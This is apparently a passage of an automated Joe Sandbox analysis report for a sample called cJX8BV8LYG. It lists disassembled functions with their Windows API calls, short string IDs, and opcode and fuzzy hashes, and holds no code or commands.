                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Connection_wcslen
                                    • String ID: *$LPT
                                    • API String ID: 1725874428-3443410124
                                    • Opcode ID: 7ed77f89818498d53b77b40fc66a7c6b333b673c2c028a8faf17dc725196d44e
                                    • Instruction ID: c12ab2b9e294e1ffc0ab1bff7b73b4e2e38966daedf48c30bc8f21aaeccf6711
                                    • Opcode Fuzzy Hash: 7ed77f89818498d53b77b40fc66a7c6b333b673c2c028a8faf17dc725196d44e
                                    • Instruction Fuzzy Hash: 00915D75A00208DFCB14DF58C484EAABBF1BF45314F188099E91A9F362D739ED85CB91
                                    Function 007AE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 007AE30D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: 7c6016c8d9644fae0186b2bb7dd14e07a5da801964a0ced23718f3ad6a9485f4
                                    • Instruction ID: ba5ee58e3d477e059df161ed98e443a290dd43113e070069a5b5751270eeb887
                                    • Opcode Fuzzy Hash: 7c6016c8d9644fae0186b2bb7dd14e07a5da801964a0ced23718f3ad6a9485f4
                                    • Instruction Fuzzy Hash: CD513D61A0C60296CF297714C9453F93B94FFC1780F348A98E0D5862E9EB3DCC95DA46
                                    Function 0079E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #
                                    • API String ID: 0-1885708031
                                    • Opcode ID: 5007714d11fa1ef19dd67e160667f5a702d49d8fddc854983eaa536619bf4824
                                    • Instruction ID: b306b8d70c1d18a2576f81b66dddac48597c361c066cb940dc6f249f8091238f
                                    • Opcode Fuzzy Hash: 5007714d11fa1ef19dd67e160667f5a702d49d8fddc854983eaa536619bf4824
                                    • Instruction Fuzzy Hash: D751F135904246DFDF16EF28D4856FA7BB8FF65320F24805AE8919F290D6389D42CBA0
                                    Function 0079F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 0079F2A2
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0079F2BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: 5ea2dc742b8c66f6551730fac8a5bd0121db85a4e96f2e09807117cb1f5fec5e
                                    • Instruction ID: 43b1e70f69433c363e43a2208aaf54f941847edf1de78f8777d43a07fd08796d
                                    • Opcode Fuzzy Hash: 5ea2dc742b8c66f6551730fac8a5bd0121db85a4e96f2e09807117cb1f5fec5e
                                    • Instruction Fuzzy Hash: BB513872418744DBE320AF11E88ABAFBBF8FF84304F91885DF19951195EB348529CB66
                                    Function 00805745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 008057E0
                                    • _wcslen.LIBCMT ref: 008057EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper_wcslen
                                    • String ID: CALLARGARRAY
                                    • API String ID: 157775604-1150593374
                                    • Opcode ID: f28f043d373059dac9374541b7bc9dbedab9c2f09fc0973da255d355b26f358a
                                    • Instruction ID: 9292c11e22f690d43a9514f3989b9ac574acd5c1c6b8807461712b8bed3a713f
                                    • Opcode Fuzzy Hash: f28f043d373059dac9374541b7bc9dbedab9c2f09fc0973da255d355b26f358a
                                    • Instruction Fuzzy Hash: 57417C31A00609DFCB04DFA9C8858AFBBB9FF59724B148069E905E7291E7349D81CFA0
                                    Function 007FD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 007FD130
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007FD13A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CrackInternet_wcslen
                                    • String ID: |
                                    • API String ID: 596671847-2343686810
                                    • Opcode ID: 2a153f484282c83afdb8f531530baca30d6bf9e52b4565e47f8a2396a5f8a7c3
                                    • Instruction ID: e306d4e90c3863c1b7067c744e1fdf996908888f18725619eef9f06c8b4d5259
                                    • Opcode Fuzzy Hash: 2a153f484282c83afdb8f531530baca30d6bf9e52b4565e47f8a2396a5f8a7c3
                                    • Instruction Fuzzy Hash: D7313071D00209EBCF15EFA4CC89AEEBFBAFF05300F000019F915A6261E735A916DB50
                                    Function 0081356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 00813621
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0081365C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: c9d91813f22ab17e6b0277e7bc24fa324ff0a7cb2bcb8501ea320d2b412ffad7
                                    • Instruction ID: a9105a76e4a58f95223924218bb5e34dc0afbb2bd24fc0af43b1c8fe0cfa8a11
                                    • Opcode Fuzzy Hash: c9d91813f22ab17e6b0277e7bc24fa324ff0a7cb2bcb8501ea320d2b412ffad7
                                    • Instruction Fuzzy Hash: D9319C71110204AEEB209F28DC81EFB73ADFF98764F109619F9A9D7280DB34AD91D760
                                    Function 00814537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0081461F
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00814634
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    • Opcode ID: 9fd6055fab36a23749a8e25b91e2fdc09f59a79d341d20c72231ab6d078551b9
                                    • Instruction ID: c71def3945c36f3f3f3bb6c57302bb09dc9adf9117e5c5d9397d446c608295e7
                                    • Opcode Fuzzy Hash: 9fd6055fab36a23749a8e25b91e2fdc09f59a79d341d20c72231ab6d078551b9
                                    • Instruction Fuzzy Hash: BD3117B4A0020A9FDF14CF69C980BDABBBAFF09304F14516AE904EB341D770A941CF90
                                    Function 008131EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0081327C
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00813287
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 7d3ec178a9175ca523a313ce209489754d74bc8725f805a27c40dacf129b2d1f
                                    • Instruction ID: e2d227d5f06d574205ed7f90a747e2964ead823edc00e5d5f5c030255f3ef4bd
                                    • Opcode Fuzzy Hash: 7d3ec178a9175ca523a313ce209489754d74bc8725f805a27c40dacf129b2d1f
                                    • Instruction Fuzzy Hash: FD116071300208BFEF25AE54DC85EEB376EFF98365F104129F918E7290D6759D918760
                                    Function 00813710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0078600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0078604C
                                      • Part of subcall function 0078600E: GetStockObject.GDI32(00000011), ref: 00786060
                                      • Part of subcall function 0078600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078606A
                                    • GetWindowRect.USER32(00000000,?), ref: 0081377A
                                    • GetSysColor.USER32(00000012), ref: 00813794
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 5c779dd37dd962a7f888e1867f6db18c4e87f2c94dbb987bfbbbf8fbba500480
                                    • Instruction ID: e62129bcdb2b6d357769122b2993878828fef7e9f7aa774a34d1ec99cd486665
                                    • Opcode Fuzzy Hash: 5c779dd37dd962a7f888e1867f6db18c4e87f2c94dbb987bfbbbf8fbba500480
                                    • Instruction Fuzzy Hash: C01137B2650209AFDF01DFA8CC4AEFA7BB8FF08314F004924F955E2250E735E8519B60
                                    Function 007FCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007FCD7D
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007FCDA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: 41564cbdbe5e230fab6f99396400723a093aae9e3547c1b397c5329b3456ce98
                                    • Instruction ID: 7966c0037984e4b03e54268a6b68a9d36d6080e48369dd22fdc54ec9efc54f37
                                    • Opcode Fuzzy Hash: 41564cbdbe5e230fab6f99396400723a093aae9e3547c1b397c5329b3456ce98
                                    • Instruction Fuzzy Hash: 1611C67135563DBAD7354B668D45EFBBEACEF127A4F004226B20983280D7789841D6F0
                                    Function 00813429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 008134AB
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008134BA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: 454798a10c804c91d62e89b7d240d1fd8e99f1a6fbe84fcd02bb087e56a270cb
                                    • Instruction ID: da241cc307e7ca94d581323a539fcece8008f577d829e50a610bc8cb2d0af73a
                                    • Opcode Fuzzy Hash: 454798a10c804c91d62e89b7d240d1fd8e99f1a6fbe84fcd02bb087e56a270cb
                                    • Instruction Fuzzy Hash: 4B116D71100208AAEB219E64EC44AEA376EFF25378F504324F965D31D0C775DD919758
                                    Function 007E6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • CharUpperBuffW.USER32(?,?,?), ref: 007E6CB6
                                    • _wcslen.LIBCMT ref: 007E6CC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: STOP
                                    • API String ID: 1256254125-2411985666
                                    • Opcode ID: ddc5dd99ae62019fbc28745f7334d5b1d097cf0d02b0331b036b34d6a5d92e76
                                    • Instruction ID: bc14be522743bb980892495ffc84a0efc38cfa0657d2ac45506d1c5d2eb89f35
                                    • Opcode Fuzzy Hash: ddc5dd99ae62019fbc28745f7334d5b1d097cf0d02b0331b036b34d6a5d92e76
                                    • Instruction Fuzzy Hash: 410104326015668BCB20AFBECC948BF73A5FB797947500528E952921A1EA39E800C760
                                    Function 007E1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007E1D4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: b6145ec84acd44efa5f4f74dc8392e06ea328c8d6ee591a284995f96de527e31
                                    • Instruction ID: 3e3d38084275830dcc40f2cf5fa840c90c65a91f8b01f53e972ceca14d6eb1f9
                                    • Opcode Fuzzy Hash: b6145ec84acd44efa5f4f74dc8392e06ea328c8d6ee591a284995f96de527e31
                                    • Instruction Fuzzy Hash: CA01B571742218EBCB04FBA5CC5A8FE7368FB5A350B540919B832673D1EA3959088760
                                    Function 007E1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 007E1C46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 965e91f47a9a8d7753eac2b3f41329f5222bbbc72b7ba2c4912f65ea9cf6a557
                                    • Instruction ID: ba8c2886bf49be65dbf5c03ecd3d57873fdc1adcbe1e7de92dd766d7ce337570
                                    • Opcode Fuzzy Hash: 965e91f47a9a8d7753eac2b3f41329f5222bbbc72b7ba2c4912f65ea9cf6a557
                                    • Instruction Fuzzy Hash: 2201A775782148ABCB04FBA1C95A9FF77A8DF19340F640019B516B72D2EA399E0887B1
                                    Function 007E1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 007E1CC8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 1ac33278927b3a57cf9f48ff01bd7ddca70f0e72f8accc673ccea7cf6352f806
                                    • Instruction ID: 039093177520cc064cca4d2600b22570afcf8ac72aafe3730a71ca61e35bb4a8
                                    • Opcode Fuzzy Hash: 1ac33278927b3a57cf9f48ff01bd7ddca70f0e72f8accc673ccea7cf6352f806
                                    • Instruction Fuzzy Hash: 4E01DB71682158A7CB04F7A5CA0AAFE73ACAB15340F640015B912B3291FA399F08C771
                                    Function 007E1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 007E1DD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 67fa8bb5d05ab023b7f567f9b5dd51e222e87fd70d29ffb3245bd70af3ef53aa
                                    • Instruction ID: cbddf6c3ed631bfb8e2fa51cf0b7b4a9fff4c8b526021bfcb8f5c468981e4ca5
                                    • Opcode Fuzzy Hash: 67fa8bb5d05ab023b7f567f9b5dd51e222e87fd70d29ffb3245bd70af3ef53aa
                                    • Instruction Fuzzy Hash: D9F0A971B82219A7D704F7A5CC5AAFE776CFB05350F580915B532732C1EA7959088370
                                    Function 0080747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: 3, 3, 16, 1
                                    • API String ID: 176396367-3042988571
